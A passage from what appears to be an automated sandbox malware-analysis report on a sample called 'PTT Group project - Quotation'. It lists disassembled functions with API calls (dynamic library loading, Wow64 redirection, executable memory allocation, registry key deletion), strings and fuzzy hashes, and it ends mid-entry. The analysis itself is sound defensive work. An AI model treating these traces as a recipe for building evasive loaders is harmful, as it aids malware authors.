Opcode ID: 198f42fc246f2ab1ef1d39f36baec03a5c1dd6b95c2bbbc1e56aed7bffa2c9bb
Instruction ID: 917c9ac05f562be7bdc60ce3a029762e5dc4e2b979667d1f7df9be9443aaff13
Opcode Fuzzy Hash: 198f42fc246f2ab1ef1d39f36baec03a5c1dd6b95c2bbbc1e56aed7bffa2c9bb
Instruction Fuzzy Hash: 77A146756043059FCB10DF18C494EAABBE9FF89314F148998F89A9B3A1CB31ED45CB91

Function 0093524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 009352DD

Part of subcall function 00940340: __87except.LIBCMT ref: 0094037B

Strings

pow, xrefs: 009352B5, 009352D2

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 8f26aa8dbe5c69a44fbcaf033d10b40e1bbe2154ec35bfdf56e2c9b1fc220820
Instruction ID: 6de92417c7fdc0b9c1b3e2b6ef7016212ed15d802b80c7a71d4bd09a621b6fb4
Opcode Fuzzy Hash: 8f26aa8dbe5c69a44fbcaf033d10b40e1bbe2154ec35bfdf56e2c9b1fc220820
Instruction Fuzzy Hash: 01517B31A1D60187CB107B24CD11B7E6B989F84750F218D58E6D5822FAEF788CD4AE82

Function 0093023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00930280
+, xrefs: 00930277

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 2a0208c8a2ef272c34fcd662e248d082ee96258cd1bba166b32502fd0c439991
Instruction ID: 39a8c43b92cebf77777339e8cf942af8c471b05c167e40adfb8f0a14ed538572
Opcode Fuzzy Hash: 2a0208c8a2ef272c34fcd662e248d082ee96258cd1bba166b32502fd0c439991
Instruction Fuzzy Hash: 8C51227550864ADFCF15DF68C4A86FA7BA8EF95310F194055EC919B2E0D7349C82CB60

Function 009262F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009263A8
_memmove.LIBCMT ref: 00926446
_memset.LIBCMT ref: 0092646A

Strings

ERCP, xrefs: 00926313

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 0d36ef341b2a8716921257c9aaf89e639f524983831b288b842cdc26255f7468
Instruction ID: 2f7aafb218924d8c82181aa7c449715e8694e05d40716f9a325e94b919eeff20
Opcode Fuzzy Hash: 0d36ef341b2a8716921257c9aaf89e639f524983831b288b842cdc26255f7468
Instruction Fuzzy Hash: 8651F671900319DFCB24DF65D881BAABBF8EF44314F20856EE58AC7650E771E684CB80

Function 00997BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0099F910,00000000,?,?,?,?), ref: 00997C4E
GetWindowLongW.USER32 ref: 00997C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00997C7B

Strings

SysTreeView32, xrefs: 00997C20

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 3f809eda7844f96220d9a580faba1eaf2d10311016118f2c7a844df2f4bb381b
Instruction ID: 829e9cc0c05d919887a45c4bfe980e96f69d15376a3fd56e36650191bb032c16
Opcode Fuzzy Hash: 3f809eda7844f96220d9a580faba1eaf2d10311016118f2c7a844df2f4bb381b
Instruction Fuzzy Hash: 7D31D031218209ABDF119F78CC45BEAB7A9EF44324F244725F8B5E22E0DB31E8919B50

Function 00997648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009976D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009976E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00997708

Strings

SysMonthCal32, xrefs: 0099769B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: d4f2ca461590358fe20e6aa76df2ee97c99d3b9a807a6fac094146f942de31a3
Instruction ID: 49f17bbb5e32a92f720538469154a75ab8b3398ecb05a9dd37590261859ccaba
Opcode Fuzzy Hash: d4f2ca461590358fe20e6aa76df2ee97c99d3b9a807a6fac094146f942de31a3
Instruction Fuzzy Hash: CA21B533614219BBDF11CF98CC46FEA7B79EF88714F110214FE156B1D0DAB5A8519BA0

Function 00996F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00996FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00996FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00996FDF

Strings

Listbox, xrefs: 00996F77

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 221d3c98af67dc38511ea432eaa31762369b5dcef496af81546fc67b4225610d
Instruction ID: 8645a343f39232ad5e9617f162850cca3832c2258e47845b68f6bfd542da8034
Opcode Fuzzy Hash: 221d3c98af67dc38511ea432eaa31762369b5dcef496af81546fc67b4225610d
Instruction Fuzzy Hash: 2A219232614118BFDF118F58EC85FAB3BAEEF89754F018124F9149B190C671AC519BA0

Function 0099797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009979E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009979F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00997A03

Strings

msctls_trackbar32, xrefs: 009979B8

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: b6863a3953460d35b590e00f54113ea0421ae02169c3ee436cf940d631167f01
Instruction ID: 2e0558672f021c598b37881410b7150449ec51b2672c021ecb2caaa8e19edd66
Opcode Fuzzy Hash: b6863a3953460d35b590e00f54113ea0421ae02169c3ee436cf940d631167f01
Instruction Fuzzy Hash: 7F11E372264208BFEF109FA8CC05FEB77ADEFC9764F010519FA41A6090D6719851DB60

Function 00914C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00914C2E), ref: 00914CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00914CB5

Strings

kernel32.dll, xrefs: 00914C9E
GetNativeSystemInfo, xrefs: 00914CAF

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 3e7d52321fc13e1b3d4fa0a8a14b0c824939dfa53b3bd5a6405ad91cb806a85e
Instruction ID: dd8d08f46cb04d5203b8165d212249fbe279ab707d47ce1af7d7b43c777bc0e8
Opcode Fuzzy Hash: 3e7d52321fc13e1b3d4fa0a8a14b0c824939dfa53b3bd5a6405ad91cb806a85e
Instruction Fuzzy Hash: B3D01231614727CFDB205F39D928686B6D9AF05795B15C83A98C9D6150D670D4C0CA90

Function 00914D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00914CE1,?), ref: 00914DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00914DB4

Strings

kernel32.dll, xrefs: 00914D9D
Wow64RevertWow64FsRedirection, xrefs: 00914DAE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 6f2eca0bdfbb9bf9b9968b9802a1a7c4955508c70463be7733710919205b26fb
Instruction ID: 45086a02b309302eb49f5299ec9082591d76ba40b32ff0f619a22d11894640fb
Opcode Fuzzy Hash: 6f2eca0bdfbb9bf9b9968b9802a1a7c4955508c70463be7733710919205b26fb
Instruction Fuzzy Hash: 7CD01235654713CFDB309F75E818A86B6D8AF0A355B11883ED8C5D6190D770D4C0CA51

Function 00914D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00914D2E,?,00914F4F,?,009D62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00914D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00914D81

Strings

kernel32.dll, xrefs: 00914D6A
Wow64DisableWow64FsRedirection, xrefs: 00914D7B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 864574a2316d6208589def2b3d449755f7f90e17bf0d8d464bdde6482dadbab3
Instruction ID: d2cc2ff71d68f31a4d5af10def29c2279e0b3e6cee7777f248a039d12246e1f5
Opcode Fuzzy Hash: 864574a2316d6208589def2b3d449755f7f90e17bf0d8d464bdde6482dadbab3
Instruction Fuzzy Hash: BCD01234614713CFDB309F75E818656B6D8AF15356B11883ED486D6290D670D4C0CB52

Function 00991072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,009912C1), ref: 00991080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00991092

Strings

RegDeleteKeyExW, xrefs: 0099108C
advapi32.dll, xrefs: 0099107B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 9a323153e0b19cf8a12ecda0d90b8a9d826b48ef3d79de6da80c5917096254fb
Instruction ID: 39d70b52175b74540bda3aca8d3660d42c40f51510f7c915f702bdde387f5827
Opcode Fuzzy Hash: 9a323153e0b19cf8a12ecda0d90b8a9d826b48ef3d79de6da80c5917096254fb
Instruction Fuzzy Hash: 6DD01230914713CFD7305F39D829A1AB6E8EF55367F118C3EA499D6150D770C4C0C651

Function 009893F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00989009,?,0099F910), ref: 00989403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00989415

Strings

kernel32.dll, xrefs: 009893FE
GetModuleHandleExW, xrefs: 0098940F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 52b06ac43dd933eb78bff903d19bef555b1b7f80c83472a1bd7565bef4f18f54
Instruction ID: 92d390bf1eb2c24838f1762e8a175c4f3c1f80ed4a4989c2435f377c84c10c15
Opcode Fuzzy Hash: 52b06ac43dd933eb78bff903d19bef555b1b7f80c83472a1bd7565bef4f18f54
Instruction Fuzzy Hash: A0D0C230518323CFC7205F34D918602B2D8AF01349B14C83F9485C2660D670C4C0D750

Function 009676C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074c93f974e002db1292f777381a5d9d2fafa366f4a124c1d7510e13cb259bf7
Instruction ID: e8bcd49ead688481c0779b2176610d9775ae3c544d961663dab9e8bbebe58543
Opcode Fuzzy Hash: 074c93f974e002db1292f777381a5d9d2fafa366f4a124c1d7510e13cb259bf7
Instruction Fuzzy Hash: F9C13B75A04216EFCB14CFA4C884AAEF7F9FF48718B158599E805EB251D730ED81DB90

Function 0098E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0098E3D2
CharLowerBuffW.USER32(?,?), ref: 0098E415

Part of subcall function 0098DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0098DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0098E615
_memmove.LIBCMT ref: 0098E628

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 14e9a1e9d2be44fbcf554baa32fadb44250c444a137c2789e261e8da0f1915f2
Instruction ID: 85c6da30571cf90db0bc5882e2d4adaa62f047b68642b9cb9da3c6cea80415ad
Opcode Fuzzy Hash: 14e9a1e9d2be44fbcf554baa32fadb44250c444a137c2789e261e8da0f1915f2
Instruction Fuzzy Hash: 52C15B716083119FC714EF28C490A6ABBE4FF88718F14896EF8999B351D731E946CF82

Function 009883A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009883D8
CoUninitialize.OLE32 ref: 009883E3

Part of subcall function 0096DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0096DAC5

VariantInit.OLEAUT32(?), ref: 009883EE
VariantClear.OLEAUT32(?), ref: 009886BF

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: c4f3fb0ccbca3564bea622f754031e7109b8d0bc649fe0361a9884e7f3afb93d
Instruction ID: ba6f7599884b3c82523192d05b1e12eefe5e85a06841900d2fe0f30456695332
Opcode Fuzzy Hash: c4f3fb0ccbca3564bea622f754031e7109b8d0bc649fe0361a9884e7f3afb93d
Instruction Fuzzy Hash: 4BA138753047059FCB10EF28C891B6AB7E5BF88314F544849F99A9B3A2DB34ED44CB92

Function 00967A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009A2C7C,?), ref: 00967C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009A2C7C,?), ref: 00967C4A
CLSIDFromProgID.OLE32(?,?,00000000,0099FB80,000000FF,?,00000000,00000800,00000000,?,009A2C7C,?), ref: 00967C6F
_memcmp.LIBCMT ref: 00967C90

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 0415e07ab72cdfa1d3504d1db7f84c5016f3a725878fe2f7d2bb500c05d17e9f
Instruction ID: b5f67823476ef5c6014db9b24b40f006a70664fb4f81ef167d2970f1fe0c1972
Opcode Fuzzy Hash: 0415e07ab72cdfa1d3504d1db7f84c5016f3a725878fe2f7d2bb500c05d17e9f
Instruction Fuzzy Hash: 3081F875A00109EFCB04DFE4C984EEEB7B9FF89315F204599E506AB250DB71AE46CB60

Function 00966DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00966E04
SysAllocString.OLEAUT32(00000000), ref: 00966EAD
VariantCopy.OLEAUT32 ref: 00966EDC
VariantClear.OLEAUT32(?), ref: 00966F03

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 6584847858bdd42d60ac5750286c404f453d1c5d971e591831d22c94b40e26d5
Instruction ID: 4250c3def63cd18d190b42169e7ba800da44afc8eaca0a7199f89b390e3fa8a0
Opcode Fuzzy Hash: 6584847858bdd42d60ac5750286c404f453d1c5d971e591831d22c94b40e26d5
Instruction Fuzzy Hash: 2251BB357083019ADB249FA9D895B6EF3E9EF89314F308C1FF596CB291DB7498809B11

Function 00999A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00FBE9F8,?), ref: 00999AD2
ScreenToClient.USER32(00000002,00000002), ref: 00999B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00999B72

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 7dd6ab1c769ca87cd8fc9da482b5affd7369111c4c504f6ca85e757dde49daa9
Instruction ID: 1a6f4ce04f6728face192920d502d500149967fc4fa64ad8c0e08c1a94379ba1
